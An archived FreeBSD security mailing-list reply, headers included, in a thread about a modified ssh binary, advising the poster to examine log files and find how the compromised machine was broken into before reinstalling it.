From owner-freebsd-security@FreeBSD.ORG  Sat Nov 27 13:29:55 2010
Return-Path: <owner-freebsd-security@FreeBSD.ORG>
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34])
	by hub.freebsd.org (Postfix) with ESMTP id A39C61065694
	for <freebsd-security@freebsd.org>;
	Sat, 27 Nov 2010 13:29:55 +0000 (UTC)
	(envelope-from jan.muenther@nruns.com)
Received: from moutng.kundenserver.de (moutng.kundenserver.de
	[212.227.126.187])
	by mx1.freebsd.org (Postfix) with ESMTP id 35C3C8FC12
	for <freebsd-security@freebsd.org>;
	Sat, 27 Nov 2010 13:29:54 +0000 (UTC)
Received: from [192.168.2.102] (pD4B9EF09.dip.t-dialin.net [212.185.239.9])
	by mrelayeu.kundenserver.de (node=mrbap0) with ESMTP (Nemesis)
	id 0MUTUB-1OwJaf3qi3-00RIN3; Sat, 27 Nov 2010 14:17:19 +0100
Message-ID: <4CF104DD.1050405@nruns.com>
Date: Sat, 27 Nov 2010 14:17:17 +0100
From: Jan Muenther <jan.muenther@nruns.com>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US;
	rv:1.9.2.12) Gecko/20101027 Lightning/1.0b2 Thunderbird/3.1.6
MIME-Version: 1.0
To: freebsd-security@freebsd.org
References: <AANLkTi=eaYSFJygru1NBqkNTBoC=2oKLuDJ1XGkMpEsC@mail.gmail.com>
	<20101127075543.f4539aec.wmoran@collaborativefusion.com>
In-Reply-To: <20101127075543.f4539aec.wmoran@collaborativefusion.com>
X-Enigmail-Version: 1.1.1
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Provags-ID: V02:K0:UWcn53l7/8MzXzjMQU6heysYwdX71Hkzowz8dT9Z46x
	tkGgHr51CN9Ne7T0bnjbAYS/iVAzgakGKmbMAG2gCeI/FwcCPC
	F/UfHyylPvfVFHRW6hXrOTsGZR5Ii8s5Q9d9F0zhx294JGuizR
	9KBL3R3AfhdP7RpCKeowqGOBLQk4Te0gEs6yQ/NkFkQ4bMrGxG
	aruY1rE56btJLoflEUSJFbw8mowmrcItGHL9TLzyEA=
Subject: Re: ssh binary modified
X-BeenThere: freebsd-security@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
List-Id: "Security issues \[members-only posting\]"
	<freebsd-security.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-security>, 
	<mailto:freebsd-security-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-security>
List-Post: <mailto:freebsd-security@freebsd.org>
List-Help: <mailto:freebsd-security-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-security>, 
	<mailto:freebsd-security-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Sat, 27 Nov 2010 13:29:55 -0000

Hello,

yeah, that box has been taken over. Now, before you nuke it and
reinstall from some trusted media, I'd try and give finding out what
exactly happened a shot. My point is that if they got in through e.g. a
flaw in a custom web app, just newly setting up the machine and
resetting the passwords is not going to make it all go away.

You don't have to be a forensics expert to at least have a long good
look at the log files.

Cheers,
Jan